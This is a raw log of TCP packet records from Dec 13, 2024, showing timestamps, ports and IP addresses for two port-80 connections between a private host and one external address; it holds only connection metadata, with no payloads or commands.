Dec 13, 2024 01:37:18.171930075 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.172297001 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.176515102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.176625013 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.176784039 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.181209087 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.181355000 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.181567907 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.185878992 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.186022997 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.186330080 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.190396070 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.190531015 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.190720081 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.194921017 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.195054054 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.195558071 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.199477911 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.199609041 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.199832916 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.203936100 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.204088926 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.204219103 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.208451033 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.208523035 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.208808899 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.212954998 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.213102102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.213213921 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.217477083 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.217591047 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.217802048 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.222004890 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.222117901 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.222191095 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.226567984 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.226715088 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.226968050 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.231072903 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.231334925 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.231446981 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.235553026 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.235589027 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.235687971 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.240098953 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.240197897 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.240407944 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.244591951 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.244678974 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.244882107 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.249104023 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.249222994 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.249562025 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.253637075 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.253767967 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.253931046 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.258141041 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.301662922 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.352070093 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.352116108 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.352325916 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.353055000 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.353163958 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.353559017 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.356667042 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.356714010 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.356981993 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.360290051 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.360409021 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.360567093 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.363957882 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.364104986 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.365921021 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.367547035 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.367583990 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.368159056 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.370948076 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.371049881 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.371221066 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.374371052 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.374429941 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.374535084 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.377751112 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.377876043 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.379803896 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.381000042 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.381098032 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.381443024 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.384164095 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.384264946 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.384422064 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.387437105 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.387473106 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.387659073 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.390521049 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.390628099 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.390875101 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.393734932 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.393845081 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.395221949 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.396867037 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.396975040 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.397540092 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.400068045 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.400279999 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.400835037 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.403280020 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.403384924 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.404082060 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.406435013 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.406529903 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.406820059 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.409600019 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.409720898 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.410610914 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.412791967 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.412916899 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.413080931 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.415975094 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.416089058 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.418858051 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.419135094 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.419272900 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.420990944 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.422342062 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.422458887 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.422883034 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.425537109 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.425677061 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.425781965 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.428709984 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.428867102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.429028988 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.431912899 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.432050943 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.432322979 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.435087919 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.435209990 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.435626030 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.438235998 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.438359976 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.438529015 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.441461086 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.441565990 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.442352057 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.444608927 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.444713116 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.445060968 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.447824955 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.447942972 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.448091984 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.450982094 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.451109886 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.451292992 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.454216957 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.454284906 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.454597950 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.457343102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.457500935 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.457814932 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.460530043 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.460618019 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.460725069 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.544532061 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.544627905 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.544795990 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.545703888 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.545841932 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.546626091 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.548249006 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.548343897 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.548681021 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.550757885 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.550890923 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.553216934 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.553344965 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.553371906 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.553531885 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.555655003 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.555761099 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.556617022 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.558043957 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.558111906 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.558496952 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.560383081 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.560492039 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.560626030 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.562691927 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.562808990 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.563941002 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.564953089 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.565112114 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.566315889 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.567212105 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.567265987 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.567840099 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.569443941 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.569560051 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.569650888 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.571614981 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.571741104 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.572077036 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.573815107 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.573914051 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.574069023 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.575956106 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.576071978 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.576231003 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.578063965 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.578191996 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.578536034 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.580235004 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.580270052 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.580836058 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.582237959 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.582343102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.582645893 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.584325075 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.584440947 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.584593058 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.586363077 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.586500883 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.588416100 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.588469028 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.588504076 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.590420961 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.590466976 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.590492964 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.592438936 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.592485905 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.592525959 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.592823982 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.594427109 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.594531059 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.596014023 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.596461058 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.596599102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.598490000 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.598578930 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.598583937 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.598823071 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.600518942 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.600631952 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.602570057 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.602633953 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.602679014 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.603503942 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.604568958 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.604691029 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.606570005 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.606657028 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.606695890 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.608593941 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.608741045 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.608768940 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.610610962 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.610757113 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.610799074 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.612087011 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.612658024 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.612776041 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.612983942 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.614670992 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.614831924 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.615144014 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.616667032 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.616775036 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.616868019 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.618706942 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.618766069 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.620757103 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.620800018 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.620866060 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.622756004 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.622860909 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.622900963 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.623133898 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.624783993 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.624936104 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.626801014 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.626928091 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.626970053 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.628722906 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.628815889 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.628941059 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.630837917 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.630942106 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.630980015 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.632719994 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.632862091 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.633002996 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.634881973 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.635003090 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.635051012 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.636904001 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.636955023 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.637074947 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.638936043 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.638981104 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.639075041 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.641014099 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.641067028 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.641108990 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.643012047 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.643096924 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.643138885 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.643220901 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.645031929 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.645138025 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.647108078 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.647161007 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.647209883 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.647342920 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.649028063 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.651865005 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.651865005 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.771641016 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:19.056854963 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:19.176717043 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:19.176810026 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:19.177130938 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:19.296927929 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504733086 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504746914 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504812002 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.504849911 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504928112 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504937887 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.504976034 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.505074978 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.505084991 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.505099058 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.505110025 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.505121946 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.505132914 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.505281925 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.505740881 CET	49719	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:20.624737978 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.624854088 CET	80	49719	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:20.624908924 CET	49719	80	192.168.2.5	185.81.68.147
